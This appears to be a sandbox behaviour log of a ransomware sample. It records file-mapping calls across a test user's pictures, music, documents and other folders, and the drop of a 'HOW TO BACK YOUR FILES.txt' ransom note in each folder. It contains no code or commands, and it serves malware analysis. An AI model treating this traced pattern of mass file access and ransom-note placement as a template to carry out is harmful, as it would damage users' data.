Fn
Create Mapping C:\Users\FD1HVy\Videos\ahcaYgdd_uS\rGivFa1k09POnyHrPjNR.avi filename = C:\Users\FD1HVy\Videos\ahcaYgdd_uS\rGivFa1k09POnyHrPjNR.avi, protection = PAGE_READWRITE, maximum_size = 54688 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\ahcaYgdd_uS\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\ahcaYgdd_uS\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms filename = C:\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms, protection = PAGE_READWRITE, maximum_size = 1632 True 1
Fn
Create Mapping C:\Users\FD1HVy\Searches\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Searches\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Saved Games\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Saved Games\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\0E0w6TbFOV.gif filename = C:\Users\FD1HVy\Pictures\0E0w6TbFOV.gif, protection = PAGE_READWRITE, maximum_size = 46176 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\0Y8YAfgHZ37VsZ3R.bmp filename = C:\Users\FD1HVy\Pictures\0Y8YAfgHZ37VsZ3R.bmp, protection = PAGE_READWRITE, maximum_size = 63152 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\1duD457p.jpg filename = C:\Users\FD1HVy\Pictures\1duD457p.jpg, protection = PAGE_READWRITE, maximum_size = 101120 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\1XaE_kKDx5.gif filename = C:\Users\FD1HVy\Pictures\1XaE_kKDx5.gif, protection = PAGE_READWRITE, maximum_size = 54096 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\4JN5OJk27EA8luclUdN4.jpg filename = C:\Users\FD1HVy\Pictures\4JN5OJk27EA8luclUdN4.jpg, protection = PAGE_READWRITE, maximum_size = 47248 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\5e7Wc.bmp filename = C:\Users\FD1HVy\Pictures\5e7Wc.bmp, protection = PAGE_READWRITE, maximum_size = 96080 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\5NeoW1fKEkQU.jpg filename = C:\Users\FD1HVy\Pictures\5NeoW1fKEkQU.jpg, protection = PAGE_READWRITE, maximum_size = 46960 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\7snkBq.bmp filename = C:\Users\FD1HVy\Pictures\7snkBq.bmp, protection = PAGE_READWRITE, maximum_size = 23312 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\7V2nOIAHdw9cQ.bmp filename = C:\Users\FD1HVy\Pictures\7V2nOIAHdw9cQ.bmp, protection = PAGE_READWRITE, maximum_size = 69856 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\7ZNXracFupquDdAVyh.png filename = C:\Users\FD1HVy\Pictures\7ZNXracFupquDdAVyh.png, protection = PAGE_READWRITE, maximum_size = 80336 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\AMY25182fq.jpg filename = C:\Users\FD1HVy\Pictures\AMY25182fq.jpg, protection = PAGE_READWRITE, maximum_size = 9312 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\Aq_JMuY.gif filename = C:\Users\FD1HVy\Pictures\Aq_JMuY.gif, protection = PAGE_READWRITE, maximum_size = 72832 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\Ce1PVVjhKneKv.jpg filename = C:\Users\FD1HVy\Pictures\Ce1PVVjhKneKv.jpg, protection = PAGE_READWRITE, maximum_size = 26240 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\D tDC8K.jpg filename = C:\Users\FD1HVy\Pictures\D tDC8K.jpg, protection = PAGE_READWRITE, maximum_size = 72320 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\EdaNrSsz8PG4d9S.png filename = C:\Users\FD1HVy\Pictures\EdaNrSsz8PG4d9S.png, protection = PAGE_READWRITE, maximum_size = 96048 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\EsY7H_GddWmcCw.bmp filename = C:\Users\FD1HVy\Pictures\EsY7H_GddWmcCw.bmp, protection = PAGE_READWRITE, maximum_size = 5616 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\gjrmcE0fc5l.png filename = C:\Users\FD1HVy\Pictures\gjrmcE0fc5l.png, protection = PAGE_READWRITE, maximum_size = 13600 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\HQIARmS0E7.jpg filename = C:\Users\FD1HVy\Pictures\HQIARmS0E7.jpg, protection = PAGE_READWRITE, maximum_size = 48112 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\iOQr98FaIzfNvYuwjB9.jpg filename = C:\Users\FD1HVy\Pictures\iOQr98FaIzfNvYuwjB9.jpg, protection = PAGE_READWRITE, maximum_size = 26992 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\Ir5ZI.bmp filename = C:\Users\FD1HVy\Pictures\Ir5ZI.bmp, protection = PAGE_READWRITE, maximum_size = 29728 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\jpJ811wuLbp.bmp filename = C:\Users\FD1HVy\Pictures\jpJ811wuLbp.bmp, protection = PAGE_READWRITE, maximum_size = 25040 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\jykDBuh.gif filename = C:\Users\FD1HVy\Pictures\jykDBuh.gif, protection = PAGE_READWRITE, maximum_size = 43680 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\mNtSm.gif filename = C:\Users\FD1HVy\Pictures\mNtSm.gif, protection = PAGE_READWRITE, maximum_size = 5536 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\oNuU.bmp filename = C:\Users\FD1HVy\Pictures\oNuU.bmp, protection = PAGE_READWRITE, maximum_size = 76320 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\oOFV7u.gif filename = C:\Users\FD1HVy\Pictures\oOFV7u.gif, protection = PAGE_READWRITE, maximum_size = 5632 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\PJWPk3ZGq4tLQ1TaA.bmp filename = C:\Users\FD1HVy\Pictures\PJWPk3ZGq4tLQ1TaA.bmp, protection = PAGE_READWRITE, maximum_size = 63808 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\QNXsOD0CxQccs.jpg filename = C:\Users\FD1HVy\Pictures\QNXsOD0CxQccs.jpg, protection = PAGE_READWRITE, maximum_size = 50464 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\qwNICVapgEY_croJBzk.bmp filename = C:\Users\FD1HVy\Pictures\qwNICVapgEY_croJBzk.bmp, protection = PAGE_READWRITE, maximum_size = 28608 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\S 0Jzd8n.gif filename = C:\Users\FD1HVy\Pictures\S 0Jzd8n.gif, protection = PAGE_READWRITE, maximum_size = 23504 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\SEPWWo1.bmp filename = C:\Users\FD1HVy\Pictures\SEPWWo1.bmp, protection = PAGE_READWRITE, maximum_size = 37376 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\udmWUxt.gif filename = C:\Users\FD1HVy\Pictures\udmWUxt.gif, protection = PAGE_READWRITE, maximum_size = 76304 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\v9mOV_kgH.gif filename = C:\Users\FD1HVy\Pictures\v9mOV_kgH.gif, protection = PAGE_READWRITE, maximum_size = 69808 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\vGoIqs1-6HE.jpg filename = C:\Users\FD1HVy\Pictures\vGoIqs1-6HE.jpg, protection = PAGE_READWRITE, maximum_size = 33376 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\VkOhDAWokkfYOk9.gif filename = C:\Users\FD1HVy\Pictures\VkOhDAWokkfYOk9.gif, protection = PAGE_READWRITE, maximum_size = 51264 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\Y0AydhkNNUR2.jpg filename = C:\Users\FD1HVy\Pictures\Y0AydhkNNUR2.jpg, protection = PAGE_READWRITE, maximum_size = 21648 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\YGhL_kMC_eqFIP.gif filename = C:\Users\FD1HVy\Pictures\YGhL_kMC_eqFIP.gif, protection = PAGE_READWRITE, maximum_size = 75824 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\ykv5 pVyi.bmp filename = C:\Users\FD1HVy\Pictures\ykv5 pVyi.bmp, protection = PAGE_READWRITE, maximum_size = 42144 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\yOcAT3Ep59x.jpg filename = C:\Users\FD1HVy\Pictures\yOcAT3Ep59x.jpg, protection = PAGE_READWRITE, maximum_size = 45408 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Pictures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\Saved Pictures\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Pictures\Saved Pictures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\Camera Roll\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Pictures\Camera Roll\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\OneDrive\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\OneDrive\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\5oW38z-l_J.m4a filename = C:\Users\FD1HVy\Music\5oW38z-l_J.m4a, protection = PAGE_READWRITE, maximum_size = 21312 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\7h4-5A5wS wr.m4a filename = C:\Users\FD1HVy\Music\7h4-5A5wS wr.m4a, protection = PAGE_READWRITE, maximum_size = 102832 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\i6PnD5hZJ2yN.mp3 filename = C:\Users\FD1HVy\Music\i6PnD5hZJ2yN.mp3, protection = PAGE_READWRITE, maximum_size = 96016 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\J42Z.mp3 filename = C:\Users\FD1HVy\Music\J42Z.mp3, protection = PAGE_READWRITE, maximum_size = 70320 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\_Z19.mp3 filename = C:\Users\FD1HVy\Music\_Z19.mp3, protection = PAGE_READWRITE, maximum_size = 71648 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\DFuSzaknIrmv.wav filename = C:\Users\FD1HVy\Music\Ps7z1Y\DFuSzaknIrmv.wav, protection = PAGE_READWRITE, maximum_size = 61552 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\hBfw7IT.m4a filename = C:\Users\FD1HVy\Music\Ps7z1Y\hBfw7IT.m4a, protection = PAGE_READWRITE, maximum_size = 39408 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\xS0okhLxs9IE8.m4a filename = C:\Users\FD1HVy\Music\Ps7z1Y\xS0okhLxs9IE8.m4a, protection = PAGE_READWRITE, maximum_size = 54160 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\Ps7z1Y\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\BTTuE.wav filename = C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\BTTuE.wav, protection = PAGE_READWRITE, maximum_size = 60608 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\VF2Fp5QeqqLYfl8gl.m4a filename = C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\VF2Fp5QeqqLYfl8gl.m4a, protection = PAGE_READWRITE, maximum_size = 43600 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\ZaPyz5 MC4yqLqS.m4a filename = C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\ZaPyz5 MC4yqLqS.m4a, protection = PAGE_READWRITE, maximum_size = 47488 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\ahtik 3dEIDK LesPgbT.mp3 filename = C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\ahtik 3dEIDK LesPgbT.mp3, protection = PAGE_READWRITE, maximum_size = 68880 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\GXnNaU1iM6.wav filename = C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\GXnNaU1iM6.wav, protection = PAGE_READWRITE, maximum_size = 34800 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\lxupC1v-qiWR2UlBD.wav filename = C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\lxupC1v-qiWR2UlBD.wav, protection = PAGE_READWRITE, maximum_size = 102656 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\OAj iWDFaki.m4a filename = C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\OAj iWDFaki.m4a, protection = PAGE_READWRITE, maximum_size = 41936 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\oJFUvhouKderw.m4a filename = C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\oJFUvhouKderw.m4a, protection = PAGE_READWRITE, maximum_size = 59616 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\-edB1.wav filename = C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\-edB1.wav, protection = PAGE_READWRITE, maximum_size = 59744 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\2qH DKgW.mp3 filename = C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\2qH DKgW.mp3, protection = PAGE_READWRITE, maximum_size = 9632 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\SiPc-hdOB.mp3 filename = C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\SiPc-hdOB.mp3, protection = PAGE_READWRITE, maximum_size = 66128 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\2kQpVkJLVFCbCOvx.m4a filename = C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\2kQpVkJLVFCbCOvx.m4a, protection = PAGE_READWRITE, maximum_size = 32496 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\aW4QN.mp3 filename = C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\aW4QN.mp3, protection = PAGE_READWRITE, maximum_size = 101648 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\G_JtWgQVBTJ7M2pd_.m4a filename = C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\G_JtWgQVBTJ7M2pd_.m4a, protection = PAGE_READWRITE, maximum_size = 19216 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\TI1y-X-BXK09.wav filename = C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\TI1y-X-BXK09.wav, protection = PAGE_READWRITE, maximum_size = 79312 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\tMHF 2k.mp3 filename = C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\tMHF 2k.mp3, protection = PAGE_READWRITE, maximum_size = 93136 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\4f5YCJ0pI.wav filename = C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\4f5YCJ0pI.wav, protection = PAGE_READWRITE, maximum_size = 95760 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\bpiTJAjWP1.m4a filename = C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\bpiTJAjWP1.m4a, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\dhAbWJ5UgoBr80.wav filename = C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\dhAbWJ5UgoBr80.wav, protection = PAGE_READWRITE, maximum_size = 9328 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\oe8JSBpRp6FDH0.wav filename = C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\oe8JSBpRp6FDH0.wav, protection = PAGE_READWRITE, maximum_size = 99328 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\WYQAYXsDjvTvV PGyfOr.m4a filename = C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\WYQAYXsDjvTvV PGyfOr.m4a, protection = PAGE_READWRITE, maximum_size = 84032 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\ddgoRP\3faLNgmV.wav filename = C:\Users\FD1HVy\Music\ddgoRP\3faLNgmV.wav, protection = PAGE_READWRITE, maximum_size = 95104 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\ddgoRP\IFQuAHV5i3JZ nilsZg.mp3 filename = C:\Users\FD1HVy\Music\ddgoRP\IFQuAHV5i3JZ nilsZg.mp3, protection = PAGE_READWRITE, maximum_size = 40864 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\ddgoRP\iJM5 PvfbTCo- In.wav filename = C:\Users\FD1HVy\Music\ddgoRP\iJM5 PvfbTCo- In.wav, protection = PAGE_READWRITE, maximum_size = 83856 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\ddgoRP\nMGREfCTbmqLn8Nm.wav filename = C:\Users\FD1HVy\Music\ddgoRP\nMGREfCTbmqLn8Nm.wav, protection = PAGE_READWRITE, maximum_size = 23248 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\ddgoRP\q8tNQuca9CLizMc.wav filename = C:\Users\FD1HVy\Music\ddgoRP\q8tNQuca9CLizMc.wav, protection = PAGE_READWRITE, maximum_size = 12768 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\ddgoRP\ysJ3TUUOloNGuy.m4a filename = C:\Users\FD1HVy\Music\ddgoRP\ysJ3TUUOloNGuy.m4a, protection = PAGE_READWRITE, maximum_size = 92480 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\ddgoRP\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\ddgoRP\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\atFhmMZ\Iq3Mk4kIcDleAb4.wav filename = C:\Users\FD1HVy\Music\atFhmMZ\Iq3Mk4kIcDleAb4.wav, protection = PAGE_READWRITE, maximum_size = 15216 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\atFhmMZ\jG41f5VsquvTqCZwY.wav filename = C:\Users\FD1HVy\Music\atFhmMZ\jG41f5VsquvTqCZwY.wav, protection = PAGE_READWRITE, maximum_size = 98192 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\atFhmMZ\kQd6LBtQrAN6lnmGB.mp3 filename = C:\Users\FD1HVy\Music\atFhmMZ\kQd6LBtQrAN6lnmGB.mp3, protection = PAGE_READWRITE, maximum_size = 93536 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\atFhmMZ\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\atFhmMZ\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\3yy255AddCwO6CDe\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\3yy255AddCwO6CDe\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Links\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Links\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Favorites\Bing.url filename = C:\Users\FD1HVy\Favorites\Bing.url, protection = PAGE_READWRITE, maximum_size = 976 True 1
Fn
Create Mapping C:\Users\FD1HVy\Favorites\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Favorites\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Favorites\Links\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Favorites\Links\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Downloads\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Downloads\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\-33gPV9.xlsx filename = C:\Users\FD1HVy\Documents\-33gPV9.xlsx, protection = PAGE_READWRITE, maximum_size = 74464 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\-3XRYUkfmqMg59Ll.pptx filename = C:\Users\FD1HVy\Documents\-3XRYUkfmqMg59Ll.pptx, protection = PAGE_READWRITE, maximum_size = 79136 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\0t09mDlRL QY9tqd.xlsx filename = C:\Users\FD1HVy\Documents\0t09mDlRL QY9tqd.xlsx, protection = PAGE_READWRITE, maximum_size = 27200 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\2qoDue.ppt filename = C:\Users\FD1HVy\Documents\2qoDue.ppt, protection = PAGE_READWRITE, maximum_size = 72768 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\35ULey8kyqPR4IR.pps filename = C:\Users\FD1HVy\Documents\35ULey8kyqPR4IR.pps, protection = PAGE_READWRITE, maximum_size = 58768 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\3nYDBBYQqc5.pptx filename = C:\Users\FD1HVy\Documents\3nYDBBYQqc5.pptx, protection = PAGE_READWRITE, maximum_size = 81216 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\7YrvN5qTysy.pptx filename = C:\Users\FD1HVy\Documents\7YrvN5qTysy.pptx, protection = PAGE_READWRITE, maximum_size = 35456 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bt9IDQZ.docx filename = C:\Users\FD1HVy\Documents\bt9IDQZ.docx, protection = PAGE_READWRITE, maximum_size = 12896 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\Database1.accdb filename = C:\Users\FD1HVy\Documents\Database1.accdb, protection = PAGE_READWRITE, maximum_size = 348928 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\DGflni.doc filename = C:\Users\FD1HVy\Documents\DGflni.doc, protection = PAGE_READWRITE, maximum_size = 28352 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\dsWpol B2cKgrldiUL.xlsx filename = C:\Users\FD1HVy\Documents\dsWpol B2cKgrldiUL.xlsx, protection = PAGE_READWRITE, maximum_size = 24080 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\dWc4-70S.docx filename = C:\Users\FD1HVy\Documents\dWc4-70S.docx, protection = PAGE_READWRITE, maximum_size = 80576 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\H8Y_brCG8G6csUiI.docx filename = C:\Users\FD1HVy\Documents\H8Y_brCG8G6csUiI.docx, protection = PAGE_READWRITE, maximum_size = 11328 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\hYjJeP1.xlsx filename = C:\Users\FD1HVy\Documents\hYjJeP1.xlsx, protection = PAGE_READWRITE, maximum_size = 98096 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\IM_wRbLvbAhaK_.csv filename = C:\Users\FD1HVy\Documents\IM_wRbLvbAhaK_.csv, protection = PAGE_READWRITE, maximum_size = 32608 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\NmNfuGn Py.pptx filename = C:\Users\FD1HVy\Documents\NmNfuGn Py.pptx, protection = PAGE_READWRITE, maximum_size = 86816 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\o-SO_hvBok5gl9ouLbt.pdf filename = C:\Users\FD1HVy\Documents\o-SO_hvBok5gl9ouLbt.pdf, protection = PAGE_READWRITE, maximum_size = 44064 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\oU6X5HPu8.docx filename = C:\Users\FD1HVy\Documents\oU6X5HPu8.docx, protection = PAGE_READWRITE, maximum_size = 50576 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\p7hRtqlqwGh-7qLSqxAb.pptx filename = C:\Users\FD1HVy\Documents\p7hRtqlqwGh-7qLSqxAb.pptx, protection = PAGE_READWRITE, maximum_size = 103056 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\PRU9 H0QOwabp888.pptx filename = C:\Users\FD1HVy\Documents\PRU9 H0QOwabp888.pptx, protection = PAGE_READWRITE, maximum_size = 30048 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\suKaNdk0NBwOysu cjX.xlsx filename = C:\Users\FD1HVy\Documents\suKaNdk0NBwOysu cjX.xlsx, protection = PAGE_READWRITE, maximum_size = 66800 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\xT4l_ROJLA_IpK4d4.docx filename = C:\Users\FD1HVy\Documents\xT4l_ROJLA_IpK4d4.docx, protection = PAGE_READWRITE, maximum_size = 7856 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
